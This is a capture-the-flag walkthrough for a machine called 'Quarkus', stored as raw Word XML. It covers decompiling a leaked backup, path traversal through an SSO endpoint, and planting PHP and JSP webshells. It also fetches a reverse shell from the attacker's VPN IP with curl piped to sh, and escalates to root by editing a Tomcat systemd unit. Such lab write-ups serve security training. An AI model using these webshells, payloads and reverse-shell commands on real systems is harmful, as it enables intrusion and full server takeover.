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Quarkus ENG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5jqpofy0qvmv"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5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v75ij9pxxkrx" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf Scan:</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from that wordlist, then checks the HTTP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the ones from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SecLists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6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fuzzing files, we can find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backup.zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we will download it to our machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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unzip backup.zip</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4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Quarkus is a Java framework tailored for deployment on Kubernetes. The main technology components surrounding it are OpenJDK HotSpot and GraalVM.</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analyze these files using → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JD-GUI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JD-GUI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with JD-GUI for instant access to methods and fields.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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open </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup.zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jd-gui.</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36900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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7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AuthController.class</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> code, we can see that we have control over two parameters → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipaddress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port 8080, we can find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/sso</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51300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/sso</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and intercept it with BurpSuite.</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here we have our parameters =)</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copy the response and paste it into the body of our request. We need to change the method from GET to POST and change the content-type to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">json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hypq0p3xdexr" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation</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saw in the code, the application will perform a curl request looking for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local-ipv4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> object and save it 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Since we control both parameters, we can write a webshell as the content of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local-ipv4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This way, we can perform path traversal and write into any directory we want. Additionally, we can change the file extension.</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipaddress</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will pass our VPN IP; otherwise, it will make a request to localhost.</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Another important detail is that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must be </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for it to print the object.</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10000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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pdn8c1j7louh" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s GO</w:t>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First, I will create the directories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latest/meta-data</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5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the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">meta-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, I will create a PHP webshell that will be the content of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local-ipv4</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system($_GET['cmd']); ?&gt;</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8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start a Python server to listen on port 1338, which is the port defined in the code.</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5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go to Burp.</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"name":"../var/www/html/wshell.php",</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"sso_provider":"aws",</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"id":1,</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"ipaddress":"&lt;IP-VPN&gt;"</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68"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can see on our Python server that it retrieved our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local-ipv4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> object.</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76"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access our webshell on port 80.</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6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successfully obtain a reverse shell =)</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start a Python server to serve our reverse shell.</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7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7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now we can use curl to retrieve the reverse shell =)</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&lt;IP-VPN&gt;/shell.sh|sh</w:t>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55900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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a shell =)</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65"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apfjyv9xtjqq" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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6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can retrieve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82"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enumeration on the server to escalate privileges and not finding anything useful, I switch to another approach: obtaining a reverse shell as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tomcat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 We just need to find the full path to write a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JSP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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write to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/tomcat/webapps/sso</w:t>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7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change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local-ipv4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload to a JSP webshell:</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 page import="java.util.*,java.io.*"%&gt;</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JSP_KIT</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cmd.jsp = Command Execution (unix)</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by: Unknown</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modified: 27/06/2003</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&lt;HTML&gt;&lt;BODY&gt;</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&lt;FORM METHOD="GET" NAME="myform" ACTION=""&gt;</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&lt;INPUT TYPE="text" NAME="cmd"&gt;</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&lt;INPUT TYPE="submit" VALUE="Send"&gt;</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&lt;/FORM&gt;</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&lt;pre&gt;</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(request.getParameter("cmd") != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">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out.println("Command: " + request.getParameter("cmd") + "&lt;BR&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">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Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">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OutputStream os = p.getOutputStream();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">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InputStream in = p.getInputStream();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">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DataInputStream dis = new DataInputStream(in);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">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String disr = dis.readLine();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">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(disr != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:ind w:left="720"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out.println(disr);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:ind w:left="720"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disr = dis.readLine();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="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1">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&lt;/pre&gt;</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&lt;/BODY&gt;&lt;/HTML&gt;</w:t>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75"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0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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"name":"../usr/share/tomcat/webapps/sso/wshell.jsp",</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"sso_provider":"aws",</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"id":1,</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"ipaddress":"&lt;IP-VPN&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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4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can access our webshell on port 8081 → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/sso/wshell.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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51"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obtain a reverse shell as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tomcat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 =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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w:t>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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77"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&lt;IP-VPN&gt;/shell.sh -o /tmp/shell.sh</w:t>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83"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6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execute our reverse shell:</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/tmp/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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6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lx6ynrec3did" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation (Privesc)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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spawning a TTY, we can execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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verify that we have permission to execute the following commands as root without a password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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(ALL) NOPASSWD: /bin/systemctl restart tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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(ALL) NOPASSWD: /bin/systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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locate the Tomcat service configuration file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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systemctl status tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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62"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edit the file → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/lib/systemd/system/tomcat.service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and change the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tomcat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 This way, Tomcat will start running as root =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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59"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execute the commands below to reload the file, saving our new configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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/bin/systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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/bin/systemctl restart tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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60"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wait for the application to start again =)</w:t>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our webshell on port 8081, we can see that we are now the root user. We just need to obtain a reverse shell again, and for that, we can use our payload saved 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5600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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A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56"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/tmp/shell.sh</w:t>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57"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85"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read the final flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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54"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sectPr>
      <w:headerReference r:id="rId45" w:type="default"/>
      <w:headerReference r:id="rId46" w:type="first"/>
      <w:headerReference r:id="rId47" w:type="even"/>
      <w:footerReference r:id="rId48" w:type="default"/>
      <w:footerReference r:id="rId49" w:type="first"/>
      <w:footerReference r:id="rId5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7">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80" name="image22.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
